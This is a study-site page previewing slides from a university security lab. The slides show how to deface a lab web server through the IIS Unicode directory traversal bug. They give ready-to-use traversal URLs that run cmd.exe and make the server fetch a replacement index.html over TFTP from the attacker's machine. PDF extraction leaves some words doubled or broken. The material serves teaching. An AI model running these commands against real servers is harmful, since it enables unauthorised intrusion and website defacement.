Docsity
Log inSign up
Docsity
Prepare for your exams
Prepare for your exams

Study with the several resources on Docsity

Earn points to download
Earn points to download

Earn points by helping other students or get them with a premium plan

Guidelines and tips
Guidelines and tips
Sell on Docsity
Sell on Docsity
Log inSign up

Prepare for your exams

Study with the several resources on Docsity

Find documents

Prepare for your exams with the study notes shared by other students like you on Docsity

Search Store documents

The best documents sold by students who completed their studies

Search through all study resources
Docsity AINEW

Summarize your documents, ask them questions, convert them into quizzes and concept maps

Explore questions

Clear up your doubts by reading the answers to questions asked by your fellow students

Earn points to download

Earn points by helping other students or get them with a premium plan

Share documents
download point icon20 Points

For each uploaded document

Answer questions
download point icon5 Points

For each given answer (max 1 per day)

All the ways to get free points
Get points immediately

Choose a premium plan with all the points you need

Study Opportunities

Choose your next study program

Get in touch with the best universities in the world. Search through thousands of universities and official partners

Community

Ask the community

Ask the community for help and clear up your study doubts

University Rankings

Discover the best universities in your country according to Docsity users

Free resources

Our save-the-student-ebooks!

Download our free guides on studying techniques, anxiety management strategies, and thesis advice from Docsity tutors

From our blog

Exams and Study
Go to the blog

Lab Exercise: Defacing a Website using IIS Unicode Exploit and TFTP, Lab Reports of Cryptography and System Security

University of the Pacific (UOP)Cryptography and System Security

A lab exercise where students are required to exploit a vulnerable web server using the iis unicode exploit and tftp to deface the target's website. The exercise involves setting up a tftp server on the attacking box, tricking the webserver into uploading a defaced webpage, and verifying the defacement.

Typology: Lab Reports

Pre 2010

Uploaded on 08/19/2009

koofers-user-9z7
koofers-user-9z7 🇺🇸

10 documents

1 / 18

Toggle sidebar

This page cannot be seen from the preview

Don't miss anything!

bg1
LAB #LAB #1414
Your Your
assignment, assignment,
should you should you
choose to accept choose to accept
it…it…
12/20/2007 1LAB 14
If any of your force be
killed or captured, the
secretary will disavow any
knowledge of your
actions...this tape will self
destruct in 5 seconds...
Good Luck, Jim
it…it…
Remote exploitation: Remote exploitation:
Deface a website using a Deface a website using a
vulnerability and vulnerability and TFTPTFTP
pf3
pf4
pf5
pf8
pf9
pfa
pfd
pfe
pff
pf12

Partial preview of the text

Download Lab Exercise: Defacing a Website using IIS Unicode Exploit and TFTP and more Lab Reports Cryptography and System Security in PDF only on Docsity!

LAB #LAB

YourYourassignment,assignment,should youshould youchoose to acceptchoose to accept it…it…

12/20/

LAB 14

If any of your force bekilled or captured, thesecretary will disavow anyknowledge of youractions...this tape will selfdestruct in 5 seconds...Good Luck, Jim

it…it… Remote exploitation:Remote exploitation:Deface a website using aDeface a website using avulnerability andvulnerability and TFTP

TFTP

LAB #LAB

Scenario

You have a remote target, an enterprise LAN that is inan un-named country. It is connected to the Internet.You have already determined, using Nessus, that thetarget’s web server is vulnerable to the IIS Unicodeexploit. Use the exploit, and the fact that there is, by default, a TFTP client on the server, to deface the 12/20/

LAB 14

default, a TFTP client on the server, to deface the target’s website.The target is:

www.jkandtc.com

LAB #LAB

Potential Show Stoppers

1.The vulnerability must be there.2.The TFTP client must still be there. 12/20/

LAB 14

For this lab:

n^ is your number!

n^ = the number of your laptop^ For example, your number is 02if your laptop number is 02

LAB #LAB

12/20/

LAB 14

NOTE:

What you do in this lab is exactly how over 400 USG web servers were defaced in the year 2000!

LAB #LAB

So… the attacking box must be a TFTP server

Make sure there is a TFTP server on your box •^

A SolarWinds TFTP server icon should be on yourdesktop

-^

If not, it should be here: Start/All Programs/SolarWinds 2003 Standard Edition/TFTP Server 12/20/

LAB 14

2003 Standard Edition/TFTP Server

-^

No need run it yet!

-^

If it is

not

installed, install it:

-^

Double-click on the

c:\tools\solarwinds.exe

icon

-^

The c:\TFTP-Root directory will be created

LAB #LAB

How You Do It

To trick the webserver, you will use the IIS directorytraversal vulnerability^ •

It’s in every Windows Server 2000 SP

-^

Open your browser, and enter the URL below–^

Enter this in your browser’s window:

http://www.jkandtc.com/scripts/..%c1%9c. 12/20/

LAB 14

http://www.jkandtc.com/scripts/..%c1%9c. ./winnt/system32/cmd.exe?/c+dir+c:^ Since this must be perfect

, copy and paste it from the

IIS-ExploitCode.txt

file in your

tools

folder

Make sure the scripts specify:

www.jkandtc.com

LAB #LAB

1. Deface the course website

(cont.)

Now, start the TFTP server on your box •^

Double-click on desktop icon:

TFTP Server

•^

Or: Select Start/All Programs/SolarWinds 2003 StandardEdition/TFTP Server

-^

Then select File/Configure 12/20/

LAB 14

LAB #LAB

Configure your TFTP server –^

Select the TFTP RootDirectory tab to see theTFTP server’s rootdirectory. –

C:\TFTP-Root

is the

default root directory. 12/20/

LAB 14

default root directory.

-^

This is the directoryused for remote fileGETs from yourserver

You must see this!

LAB #LAB

OPTIONAL: Open a DOS window and run netstat –a to ensure thatthe TFTP service is running on

Port 69

12/20/

LAB 14

1. Deface the course website

(cont.)

•^

You’re in luck! By default, every W2K Server TFTP client installed in its

system

directory!

•^

So use the TFTP client to GET files from your server…Use the exploit to have the IIS server GET your new page (thefirst IP address is that of the victim/webserver).

Do This:

http://www.jkandtc.com/scripts/..%c1%9c../

LAB #LAB

12/20/

LAB 14

http://www.jkandtc.com/scripts/..%c1%9c../ winnt/system32/cmd.exe?/c+tftp+–i+192.168.0.

+GET+index.html+c:\inetpub\

wwwroot\

n \index.html Your n!

Your IP address!

Use the correct IP address of the webserver! Your website on the server is at

: c:\inetpub\wwwroot\

*n* index.html

1. Deface the course website

(cont.)

•^

Re-visit your website on my webserver by… Entering this in your web browser: http://www.jkandtc.com/

n /index.html^ 

your n!

•^

Is it defaced? YEAH!

LAB #LAB

12/20/

LAB 14

•^

AGAIN:

The above was exactly how over 400 USG web

servers were defaced in the year 2000!

LAB #LAB

Troubleshooting

Look at

your

TFTP server window – did it log your copy

of^ index.html

being sent to the server?

If not:

1.^

Make sure you specified the Windows 2000 server asthe destination IP address.

2.^

The source IP address is yours. 12/20/

LAB 14

3.^

Your TFTP server’s TFTP-Root directory includesindex.html

4.^

The file being transferred is index.html.

5.^

The index.html on the web server is

not

read-only

See next slide…